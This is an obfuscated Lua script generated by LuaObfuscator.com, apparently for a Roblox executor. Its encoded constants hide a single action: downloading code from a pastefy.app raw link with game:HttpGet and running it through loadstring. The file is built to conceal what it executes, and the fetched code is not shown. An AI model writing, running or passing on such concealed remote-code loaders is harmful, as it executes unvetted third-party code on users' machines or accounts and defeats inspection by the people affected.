--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v85=v2(v0(v30,16));if v19 then local v114=v5(v85,v19);v19=nil;return v114;else return v85;end end end);local function v20(v31,v32,v33) if v33 then local v86=0 -0 ;local v87;while true do if (v86==(0 -0)) then v87=(v31/((3 -(1 -0))^(v32-(2 -1))))%((621 -(555 + 64))^(((v33-(932 -(857 + 74))) -(v32-(1066 -(68 + 997)))) + (569 -(367 + 201)))) ;return v87-(v87%1) ;end end else local v88=927 -(214 + (1983 -(226 + 1044))) ;local v89;while true do if (v88==(0 + 0)) then v89=(1 + 1)^(v32-(878 -(282 + 595))) ;return (((v31%(v89 + v89))>=v89) and (1638 -(1523 + (496 -382)))) or ((117 -(32 + 85)) + 0 + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 1 + 1 );v18=v18 + (959 -(892 + 65)) ;return (v36 * (610 -354)) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (5 -2) );v18=v18 + (7 -(7 -4)) ;return (v40 * (16777566 -(87 + 263))) + (v39 * (65716 -(67 + 113))) + (v38 * (188 + 68)) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=1 + 0 ;local v44=(v20(v42,792 -(368 + 423) ,79 -59 ) * ((954 -(802 + 150))^(85 -(220 -167)))) + v41 ;local v45=v20(v42,21,55 -24 );local v46=((v20(v42,24 + 8 )==(3 -2)) and  -(1 + 0)) or (998 -(915 + (299 -217))) ;if (v45==(0 -0)) then if (v44==(0 + 0)) then return v46 * (0 -0) ;else v45=1188 -(1069 + 118) ;v43=0 -0 ;end elseif (v45==(4477 -2430)) then return ((v44==((0 -0) + 0)) and (v46 * ((1 -0)/(772 -(201 + 571))))) or (v46 * NaN) ;end return v8(v46,v45-(2161 -(116 + 1022)) ) * (v43 + (v44/((2 + 0)^(911 -(814 + 45))))) ;end local function v25(v47) local v48;if  not v47 then v47=v23();if (v47==0) then return "";end end v48=v3(v16,v18,(v18 + v47) -(2 -1) );v18=v18 + v47 ;local v49={};for v66=1 + 0 , #v48 do v49[v66]=v2(v1(v3(v48,v66,v66)));end return v6(v49);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v50=(function() return function(v90,v91,v92,v93,v94,v95,v96,v97) local v90=(function() return 0;end)();local v91=(function() return;end)();local v92=(function() return;end)();while true do if (v90== #"\\") then if (v91== #"\\") then v92=(function() return v93()~=(0 -0) ;end)();elseif (v91==2) then v92=(function() return v94();end)();elseif (v91== #"asd") then v92=(function() return v95();end)();end v96[v97]=(function() return v92;end)();break;end if (v90==(675 -(534 + 141))) then local v120=(function() return 0;end)();local v121=(function() return;end)();while true do if (v120~=0) then else v121=(function() return 0;end)();while true do if (v121==(0 + 0)) then v91=(function() return v93();end)();v92=(function() return nil;end)();v121=(function() return 1;end)();end if (v121~=(1 + 0)) then else v90=(function() return  #",";end)();break;end end break;end end end end return v90,v91,v92,v93,v94,v95,v96,v97;end;end)();local v51=(function() return function(v98,v99,v100,v101,v102,v103,v104,v105,v106) local v107=(function() return 0;end)();local v98=(function() return;end)();local v99=(function() return;end)();while true do if (v107==1) then local v122=(function() return 0;end)();while true do if (v122~=0) then else while true do if (v98==(0 + 0)) then v99=(function() return v100();end)();if (v101(v99, #"~", #"}")~=0) then else local v128=(function() return 0;end)();local v129=(function() return;end)();local v130=(function() return;end)();local v131=(function() return;end)();while true do if (v128==3) then if (v101(v130, #"19(", #"19(")~= #",") then else v131[ #"xnxx"]=(function() return v104[v131[ #"http"]];end)();end v105[v106]=(function() return v131;end)();break;end if ((3 -1)==v128) then if (v101(v130, #"}", #"}")== #"{") then v131[2]=(function() return v104[v131[2]];end)();end if (v101(v130,2,2 -0 )~= #"}") then else v131[ #"xxx"]=(function() return v104[v131[ #"xnx"]];end)();end v128=(function() return 8 -5 ;end)();end if (v128~=1) then else local v167=(function() return 0;end)();local v168=(function() return;end)();while true do if (0==v167) then v168=(function() return 0 + 0 ;end)();while true do if (v168==(0 + 0)) then v131=(function() return {v102(),v102(),nil,nil};end)();if (v129==0) then local v184=(function() return 0;end)();local v185=(function() return;end)();while true do if (v184~=(0 -0)) then else v185=(function() return 0 + 0 ;end)();while true do if (0==v185) then v131[ #"-19"]=(function() return v102();end)();v131[ #".dev"]=(function() return v102();end)();break;end end break;end end elseif (v129== #"[") then v131[ #"xxx"]=(function() return v103();end)();elseif (v129==2) then v131[ #"91("]=(function() return v103() -(2^(38 -22)) ;end)();elseif (v129~= #"19(") then else local v190=(function() return 0 -0 ;end)();while true do if (v190==0) then v131[ #"xxx"]=(function() return v103() -((869 -(550 + 317))^(22 -6)) ;end)();v131[ #"xnxx"]=(function() return v102();end)();break;end end end v168=(function() return 1 -0 ;end)();end if (v168~=1) then else v128=(function() return 2;end)();break;end end break;end end end if (v128==(0 -0)) then v129=(function() return v101(v99,2, #"asd");end)();v130=(function() return v101(v99, #".com",291 -(134 + 151) );end)();v128=(function() return 1666 -(970 + 695) ;end)();end end end break;end end return v98,v99,v100,v101,v102,v103,v104,v105,v106;end end end if (v107~=(0 -0)) then else local v123=(function() return 0;end)();while true do if (1~=v123) then else v107=(function() return 1991 -(582 + 1408) ;end)();break;end if (v123==0) then v98=(function() return 0 -0 ;end)();v99=(function() return nil;end)();v123=(function() return 1 -0 ;end)();end end end end end;end)();local v52=(function() return function(v108,v109,v110) local v111=(function() return 0;end)();while true do if (v111==(0 -0)) then local v124=(function() return 0;end)();while true do if (v124~=(1824 -(1195 + 629))) then else v108[v109-#"}" ]=(function() return v110();end)();return v108,v109,v110;end end end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #"|",v57 do FlatIdent_6D4CB,Type,Cons,v21,v24,v25,v58,v68=(function() return v50(FlatIdent_6D4CB,Type,Cons,v21,v24,v25,v58,v68);end)();end v56[ #"gha"]=(function() return v21();end)();for v69= #" ",v23() do FlatIdent_12703,Descriptor,v21,v20,v22,v23,v58,v53,v69=(function() return v51(FlatIdent_12703,Descriptor,v21,v20,v22,v23,v58,v53,v69);end)();end for v70= #"|",v23() do v54,v70,v28=(function() return v52(v54,v70,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[1];local v64=v60[243 -(187 + 54) ];local v65=v60[783 -(162 + 618) ];return function(...) local v71=v63;local v72=v64;local v73=v65;local v74=v27;local v75=1 + (114 -(4 + 110)) ;local v76= -(1 + 0);local v77={};local v78={...};local v79=v12("#",...) -(1 -0) ;local v80={};local v81={};for v112=0 -0 ,v79 do if (v112>=v73) then v77[v112-v73 ]=v78[v112 + 1 + 0 ];else v81[v112]=v78[v112 + (1637 -(1373 + 263)) ];end end local v82=(v79-v73) + 1 ;local v83;local v84;while true do local v113=1000 -(451 + 549) ;while true do if ((77<=4230) and (v113==((585 -(57 + 527)) + 0))) then if ((v84<=(10 -3)) or (3283==2211)) then if (v84<=(4 -(1428 -(41 + 1386)))) then if (v84<=(1385 -(746 + 638))) then if (v84==(0 + 0)) then local v132=0 -0 ;local v133;local v134;while true do if ((1850>=18) and (v132==(342 -((321 -(17 + 86)) + 123)))) then v81[v133 + (1582 -(1535 + 46)) ]=v134;v81[v133]=v134[v83[4]];break;end if (v132==(0 + 0)) then v133=v83[1 + 1 ];v134=v81[v83[563 -(306 + 254) ]];v132=1 + 0 ;end end else do return;end end elseif (v84>((3 + 0) -(1 -0))) then v81[v83[2]]();else v81[v83[1469 -(899 + 568) ]]=v83[8 -5 ];end elseif (v84<=(4 + 1)) then if (v84>(9 -5)) then local v137=v83[605 -(268 + 335) ];v81[v137]=v81[v137](v13(v81,v137 + (291 -(60 + 230)) ,v76));else v81[v83[(740 -(122 + 44)) -((735 -309) + 146) ]]=v62[v83[1 + 2 ]];end elseif ((1830<3669) and (v84==6)) then do return;end else v81[v83[1458 -(282 + (3894 -2720)) ]]=v62[v83[814 -(569 + 242) ]];end elseif (v84<=(31 -20)) then if ((v84<=9) or (1430>=3612)) then if (v84>(1 + 7)) then v81[v83[2 + 0 ]]();else v81[v83[2]]={};end elseif ((2683>=2460) and (v84>(1034 -(706 + 318)))) then local v144=v83[1253 -(721 + 530) ];local v145=v81[v83[1 + 2 ]];v81[v144 + ((2576 -1304) -(945 + 326)) ]=v145;v81[v144]=v145[v83[9 -5 ]];else local v149=v83[2 + 0 ];local v150,v151=v74(v81[v149](v13(v81,v149 + (701 -(271 + 429)) ,v83[68 -(30 + 35) ])));v76=(v151 + v149) -1 ;local v152=0;for v163=v149,v76 do v152=v152 + 1 ;v81[v163]=v150[v152];end end elseif ((v84<=(12 + 1)) or (1804>=3275)) then if ((v84==(1512 -(968 + 440 + 92))) or (1417>3629)) then local v153=1086 -(461 + 625) ;local v154;local v155;local v156;local v157;while true do if ((4795>402) and ((1290 -(993 + 295))==v153)) then for v177=v154,v76 do local v178=(1257 -(1043 + 214)) + 0 ;while true do if ((4813>3565) and (v178==(1171 -(418 + 753)))) then v157=v157 + 1 + 0 ;v81[v177]=v155[v157];break;end end end break;end if (v153==(1 + 0)) then v76=(v156 + v154) -(1 + 0) ;v157=0 + 0 ;v153=531 -(406 + 123) ;end if (v153==(1769 -(1749 + 20))) then v154=v83[1 + 1 ];v155,v156=v74(v81[v154](v13(v81,v154 + 1 ,v83[11 -8 ])));v153=1323 -(1249 + 73) ;end end else v81[v83[1214 -(323 + 889) ]]=v83[2 + 1 ];end elseif ((3912==3912) and (v84>((3119 -1960) -((1046 -(361 + 219)) + 679)))) then local v160=0 -(320 -(53 + 267)) ;local v161;while true do if (v160==(0 -0)) then v161=v83[(430 + 1472) -(106 + 1794) ];v81[v161]=v81[v161](v13(v81,v161 + (414 -(15 + 398)) ,v76));break;end end else v81[v83[1 + 1 ]]={};end v75=v75 + 1 + 0 ;break;end if (v113==(0 -0)) then v83=v71[v75];v84=v83[1];v113=2 -1 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403203Q00682Q7470733A2Q2F706173746566792E612Q702F615575707445424C2F72617700094Q00087Q001207000100013Q001207000200023Q00200B00020002000300120D000400044Q000C000200044Q000F00013Q00022Q00030001000100012Q00013Q00017Q00",v9(),...);
